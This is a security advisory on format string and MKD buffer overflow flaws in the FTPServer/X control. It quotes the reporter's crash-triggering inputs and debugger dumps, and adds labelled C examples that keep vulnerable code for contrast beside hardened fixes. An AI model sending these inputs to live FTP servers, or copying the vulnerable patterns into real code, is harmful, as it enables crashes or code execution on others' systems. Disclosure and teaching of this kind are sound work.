SecurityTracker.com
Category:   Application (File Transfer/Sharing)  >   FTPServer/X
Vendor:   Mabry Software
FTPServer/X Format String Flaw and Buffer Overflow May Permit Remote Code Execution
SecurityTracker Alert ID:  1008667
SecurityTracker URL:  http://securitytracker.com/id/1008667
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Jan 12 2004
Impact:   Execution of arbitrary code via network, User access via network

Version(s): 1.00.050
Description:   securma massine reported two vulnerabilities in FTPServer/X, an ActiveX/COM control that several third-party FTP servers embed. A remote user can trigger a format string flaw with the username, before authenticating; a remote authenticated user can trigger a stack buffer overflow with a directory-creation command. Either flaw may allow arbitrary code execution on the target system.

It is reported that there is a format string vulnerability in the handling of the username. A remote user can supply a specially crafted username (such as '%s%s%s%s' or '%999d') to trigger the flaw. The crash dump in the source message places the fault inside USER32!wsprintfA, which is consistent with the username being passed to that routine as the format string. It may be possible to cause arbitrary code to be executed.
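The following is an added example (not code from the advisory, from the reporter, or from Mabry) of why a username such as '%s%s%s%s' or '%999d' faults inside a printf-family routine, and what the corrected call looks like. Two facts from the page drive it: the crash lands in USER32!wsprintfA, which takes no buffer-size argument and writes up to 1024 bytes, so only the format limits the expansion; and the register dump is consistent with a '%s' directive consuming stack data as a pointer (eax=20313333 is the ASCII bytes "331 " read little-endian, the start of a 331 reply). The format-audit routine, the username check and the buffer sizes below are illustrative assumptions, and portable snprintf stands in for wsprintfA.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Result of auditing an untrusted string as if it were a printf-style format. */
typedef struct {
    int    conversions; /* argument-consuming directives; -1 if malformed */
    size_t min_bytes;   /* lower bound on the bytes the format would emit */
} fmt_audit;

/* Walk the string with the printf grammar: %[flags][width][.prec][length]conv.
 * "%%" is a literal percent; '*' for width/precision consumes an extra argument.
 * The vulnerable caller passes no arguments at all, so every conversion counted
 * here reads whatever happens to be on the stack (that is the bug in the report). */
fmt_audit audit_format(const char *s)
{
    fmt_audit a = {0, 0};
    const char *p = s;
    while (*p) {
        if (*p != '%') { a.min_bytes++; p++; continue; }
        p++;
        if (*p == '%') { a.min_bytes++; p++; continue; }
        while (*p && strchr("-+ #0", *p)) p++;            /* flags */
        size_t width = 0;
        if (*p == '*') { a.conversions++; p++; }          /* width from an argument */
        else while (*p >= '0' && *p <= '9') { width = width * 10 + (size_t)(*p - '0'); p++; }
        if (*p == '.') {                                  /* precision */
            p++;
            if (*p == '*') { a.conversions++; p++; }
            else while (*p >= '0' && *p <= '9') p++;
        }
        while (*p && strchr("hlLjzt", *p)) p++;           /* length modifiers */
        if (!*p || !strchr("diouxXeEfFgGaAcspn", *p)) {   /* conversion character */
            a.conversions = -1;                           /* dangling or unknown directive */
            return a;
        }
        a.conversions++;
        a.min_bytes += width;   /* "%999d" pads to at least 999 bytes on its own */
        p++;
    }
    return a;
}

/* Defence in depth for code paths that cannot be changed (assumed policy):
 * refuse usernames that would act as directives if they ever reached a format. */
bool username_is_suspicious(const char *user)
{
    return audit_format(user).conversions != 0;
}

/* Vulnerable pattern, kept only for contrast: the attacker's string IS the format.
 * With wsprintfA there is not even a size argument; it writes up to 1024 bytes.
 * The pragma silences the compiler warning that would normally flag this call. */
#pragma GCC diagnostic push
#pragma GCC diagnostic ignored "-Wformat-security"
int log_user_vulnerable(char *out, size_t n, const char *user)
{
    return snprintf(out, n, user);
}
#pragma GCC diagnostic pop

/* Hardened form: the username is always an argument, never the format, so
 * "%s%s%s%s" is copied as eight literal bytes. */
int log_user_hardened(char *out, size_t n, const char *user)
{
    return snprintf(out, n, "USER %s", user);
}

int main(void)
{
    /* constructed probes: a benign name, the two from the report, an escaped
     * percent and a dangling one */
    const char *probes[] = {"alice", "%s%s%s%s", "%999d", "100%%", "%"};
    char line[128];
    for (size_t i = 0; i < sizeof probes / sizeof probes[0]; i++) {
        fmt_audit a = audit_format(probes[i]);
        log_user_hardened(line, sizeof line, probes[i]);
        printf("%-10s conversions=%2d min_bytes=%4zu suspicious=%d hardened=\"%s\"\n",
               probes[i], a.conversions, a.min_bytes,
               (int)username_is_suspicious(probes[i]), line);
    }
    return 0;
}
```

Compiling with -Wformat-security (or -Wformat=2) is the cheapest check for this class of bug in a native code base: any printf-family call whose format is not a string literal gets flagged, which is exactly the shape of the vulnerable function above.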

It is also reported that a remote authenticated user can supply a specially crafted 'mkdir' command (the FTP MKD command) to trigger a stack buffer overflow. The crash dump in the source message shows EIP fully controlled by the supplied data (eip=41414141), so arbitrary code could be executed on the target system.

The report indicated that the FTPServer/X component is used in other FTP server products such as Simple FTPServer Example, Mollensoft FTP Server, Hyperion FTP Server, and Enceladus server.

The vendor has reportedly been notified.

Impact:   A remote user or a remote authenticated user may be able to execute arbitrary code on the target system. The code will run with the privileges of the FTP service.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.mabry.com/ftpserv/index.htm
Cause:   Boundary error, Input validation error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  FTPServer/X multiples vulnerability


hi

FTPServer/X is a product of http://www.marby.com. It is an OCX/COM control which
makes it possible to manage users, upload, download, delete and other FTP commands.
This product is used by many commercial FTP servers on the Net, in particular:
Simple FTPServer Example
Mollensoft FTP Server
Hyperion FTP Server
Enceladus server

Vulnerable ActiveX Controls:
  * FTPServer/X - FTP Server Control and COM Object version 1.00.050
Mabry claims to have fixed most of the vulnerabilities affecting this ActiveX control
("Response Buffer Overflow Vulnerability"), but it appears that other serious
vulnerabilities remain: attacks of the DoS type and/or arbitrary command execution
on the server using this ActiveX control.
1 - format string:
two attacks are possible:
a- traditional format string:
220 Mollensoft FTP Server 3.5.3 Ready.
User (127.0.0.1:(none)): %s%s%s%s

(ed0.bc0): Access violation - code c0000005 (!!! second chance !!!)
eax=20313333 ebx=0000000a ecx=20313333 edx=00000000 esi=20313334 edi=0012c924
eip=77d1ca84 esp=0012c8ac ebp=0012c8e4 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\system32\USER32.dll -
USER32!wsprintfA+0x11a:
77d1ca84 8a10             mov     dl,[eax]                ds:0023:20313333=??


b- variable synchronization mechanism:
220 Mollensoft FTP Server 3.5.3 Ready.
User (127.0.0.1:(none)): %999d

(914.8fc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=ffffffff ebx=770e14e8 ecx=719923a2 edx=50e24f90 esi=0012fce4 edi=000000cd
eip=77e578ce esp=0012cd04 ebp=0012fd00 iopl=0         nv up ei pl nz ac pe cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010213
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\system32\kernel32.dll -
by several
threads)
77e578ce f00fc101         lock    xadd [ecx],eax    ds:0023:719923a2=0000ae85

2 - buffer overflow:
A buffer overflow affects the mkdir command (and other commands); EIP points directly
at bytes 41,42,43,44 of the buffer. This BOF happens in two stages:
  first there is an exception at 50e14331 mov [edi], edx (edx=41414141 eax=41414141)
and
mov [edi],edx
mov ebx,[esp]
push ecx
push ebx
call ntdll!ultoa+0x1f
  ..
  ..
ntdll!RtlConvertUlongToLargeInteger+0x68:
77f7339e ffd1             call    ecx {41414141}

until we arrive at a classic buffer overflow:
eax=00000000 ebx=00000000 ecx=41414141 edx=77f733b4 esi=00000000 edi=00000000
eip=41414141 esp=0012bb50 ebp=0012bb70 iopl=0         nv up ei pl zr na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
41414141 ??               ???

Mabry was contacted, without answer.

securma massine

greetz:anasoft simo abder marocit and crack.fr
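The report above shows three controlled values on the way to the crash (edx=41414141 at the first write fault, call ecx with ecx=41414141, then eip=41414141), i.e. more than one saved pointer is clobbered before the final return. The following added example (not code from the advisory, from the reporter, or from Mabry) models only that final effect: an unbounded copy of the MKD argument into a fixed stack buffer, and the return-address slot that the copy reaches. The frame layout, the 64-byte buffer and the 5xx reply texts are assumptions for illustration; the real FTPServer/X buffer size and offsets are not known from the report, so the offset 68 below is the model's, not the product's. The hardened handler checks the length before copying, which is the fix the overflow calls for.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Assumed 32-bit frame of the handler that copies the MKD argument: a fixed
 * path buffer, then the saved EBP, then the return address (x86 cdecl order). */
#define PATH_MAX_BYTES 64
struct handler_frame {
    char     path[PATH_MAX_BYTES];
    uint32_t saved_ebp;
    uint32_t ret;
};

/* Offset into the MKD argument at which bytes land on the return address. */
size_t ret_offset(void)
{
    return offsetof(struct handler_frame, ret);
}

/* Model of the unbounded copy. The copy length is whatever the client sent;
 * the frame is rebuilt from a raw byte image so the model itself stays
 * well-defined while reproducing the effect of writing past `path`.
 * Returns the value that would be popped into EIP when the handler returns. */
uint32_t model_mkd_unbounded(const char *arg, size_t len)
{
    unsigned char raw[sizeof(struct handler_frame)];
    memset(raw, 0, sizeof raw);
    memcpy(raw, arg, len < sizeof raw ? len : sizeof raw);
    struct handler_frame f;
    memcpy(&f, raw, sizeof f);
    return f.ret;
}

/* Length of `s` without reading more than `cap` bytes: an FTP line is
 * delimited by CRLF, so the argument need not be NUL-terminated. */
static size_t bounded_len(const char *s, size_t cap)
{
    size_t n = 0;
    while (n < cap && s[n] != '\0') n++;
    return n;
}

/* Hardened handler: the length is checked before any byte is copied, and an
 * over-long argument gets a 5xx reply instead of a crash. Creating the
 * directory is left out; only the argument handling is modelled. */
int mkd_hardened(const char *arg, char *reply, size_t reply_len)
{
    size_t n = bounded_len(arg, PATH_MAX_BYTES);
    if (n == 0 || n >= PATH_MAX_BYTES) {
        snprintf(reply, reply_len, "501 Path name missing or longer than %d bytes",
                 PATH_MAX_BYTES - 1);
        return -1;
    }
    char path[PATH_MAX_BYTES];
    memcpy(path, arg, n);
    path[n] = '\0';
    snprintf(reply, reply_len, "257 \"%s\" directory created", path);
    return 0;
}

int main(void)
{
    char probe[300];                     /* constructed: the classic run of 'A' */
    memset(probe, 'A', sizeof probe);
    printf("ret slot at offset %zu; EIP after overflow = 0x%08x\n",
           ret_offset(), model_mkd_unbounded(probe, sizeof probe));

    char reply[128];
    mkd_hardened(probe, reply, sizeof reply);
    printf("hardened: %s\n", reply);
    mkd_hardened("incoming", reply, sizeof reply);
    printf("hardened: %s\n", reply);
    return 0;
}
```

Running the model with the 'A' run gives EIP 0x41414141, the value in the report's final register dump; replacing the four bytes at the return-slot offset with a marker shows that the attacker chooses EIP byte for byte. The hardened handler turns the same input into a 501 reply without copying anything.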

Copyright 2021, SecurityGlobal.net LLC